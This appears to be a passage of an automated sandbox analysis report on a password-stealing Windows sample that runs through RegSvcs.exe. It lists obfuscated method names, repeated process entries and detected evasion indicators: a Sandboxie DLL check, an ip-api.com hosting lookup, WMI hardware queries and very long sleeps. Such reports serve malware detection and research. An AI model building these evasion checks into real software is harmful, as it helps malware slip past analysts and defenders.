                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, GnSOTlr1b77UloFibg.csHigh entropy of concatenated method names: 'WKVYUKqkJR', 'gjgYuyTiGG', 'e81YcShygu', 'fwyYCvohht', 'BruYg1HBpK', 'IelchYVhk4', 'xjhcLR7oIg', 'rnfc4gbKMT', 'REhcWngy5m', 'U8CcT5gLmm'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, E0rExKie3hHCJPFZff.csHigh entropy of concatenated method names: 'bxHAcIv0w', 'qB5JGOqtu', 'LsDdvUJsh', 'K7rRmcqTN', 'Wy60JggWE', 'uZLj0awby', 'zeX3U5VALuwFXl0mYW', 'BuNwCmZWwELlRCgqHD', 'lVGBdcsxL', 'gqGqpMh9O'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, KChJkgXrF9FCTRZi8C.csHigh entropy of concatenated method names: 'gBXC20oes1', 'l0SC77491C', 'FesCYbuDu0', 'ShpYyCXy3U', 'ihLYzYGVgo', 'OoVCviRZnd', 's8HCt9dL5D', 'tA5CiT09qj', 'FYnCMm0IUL', 'EATCwmHXdG'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, Hl6kJnF7o6y5N48Hyr.csHigh entropy of concatenated method names: 'ToString', 'VgNND3uSwY', 'eOsNOABW7m', 'pJfNHJfYsZ', 'uGvNSg6oii', 'na1N9vkIfp', 'lW3NQvrYsy', 'I6WNXFlYFS', 'p2uNft13R3', 'd1WNE0hXl3'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, gr9N19u0UekdRQeJfn.csHigh entropy of concatenated method names: 'Dispose', 'LR6tT198Q3', 'Yq4iOVwGXX', 'ua266f1iM3', 'DTstyxrdIs', 'uUctzGWSPM', 'ProcessDialogKey', 'NfjiveCemC', 'pFOitXFVty', 'PD8iitpVDF'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, MgZETsGPO4Ak6hkigF.csHigh entropy of concatenated method names: 'FSVuanb8wK', 'NsLuIR2eMV', 'HixuFylLas', 'uLGulstONi', 'vhquh5saAL', 'WdvuLl95Vx', 'JD5u4SYalZ', 'TbsuWYMysl', 'cwjuTToYLV', 'j72uy2TnGo'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, z5E0BltMwdUb6Ko9cao.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'G2ZqaO4Z0Z', 'KywqINd4Jb', 'RhtqFlmmXO', 'VXHqlH3bQp', 'WOuqhkk2Yd', 'KrOqLrf9Io', 'zDWq4WO9nG'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, otPKVEEkVy5OK1pSff.csHigh entropy of concatenated method names: 'LqPCZphQjH', 'C5LCodrQU7', 'Y3HCA40coN', 'ckDCJY58vD', 'rXCCklbouq', 'AxNCdpCdCc', 'Fl0CRMbhu9', 'zd4CGn2Z9D', 'aDnC0g6PMA', 'qImCjwHexn'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, XwsHKfzum4RCm3S1g5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SrRnmMM5Nc', 'ovSnbAYV7T', 'X4mnNbNWs9', 'PWvn8r1N9D', 'YQdnBH0Nd9', 'BPFnn7dh6M', 'gEcnqWEFYu'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, XFTP5YjZW0srB3DVl2.csHigh entropy of concatenated method names: 'Oofck1r9o6', 'Rr6cR2URL4', 'ucE7HDkCRt', 'T197SspOqk', 'X2X7969rBA', 'uyh7QdPYHk', 'CNB7X4rJul', 'yIb7f0f3q6', 'uZE7ErAf2C', 'xmL73HBQMJ'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, ydfk6w7eOCbZcMNaQJ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w2KiT2XD8L', 'zaGiyRHXA2', 'xR0izSQ2r3', 'cHgMvyw4wE', 'U6yMtP4hQd', 'KZ8Mi9ngCv', 'YDaMMLIgQc', 'RXpEUMrtps82hWcNHKK'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, ApRph4tvlQksfJT0qoC.csHigh entropy of concatenated method names: 'ImlnZK1dJ6', 'qnvnosKQ9B', 'yefnA5wIao', 'iZcnJiK5S6', 'uRPnkusbHM', 'YvWndN3ZVf', 'yFtnRA3x9v', 'rm3nG7vMUH', 'V76n0bnILq', 'EQRnjk8Fa2'
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe PID: 5448, type: MEMORYSTR
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: FF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: 7C20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: 8C20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: 8DE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: 9DE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: A3A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: B3A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: C3A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599889Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599528Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599181Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1286Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8517Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe TID: 2612Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599889Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599528Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
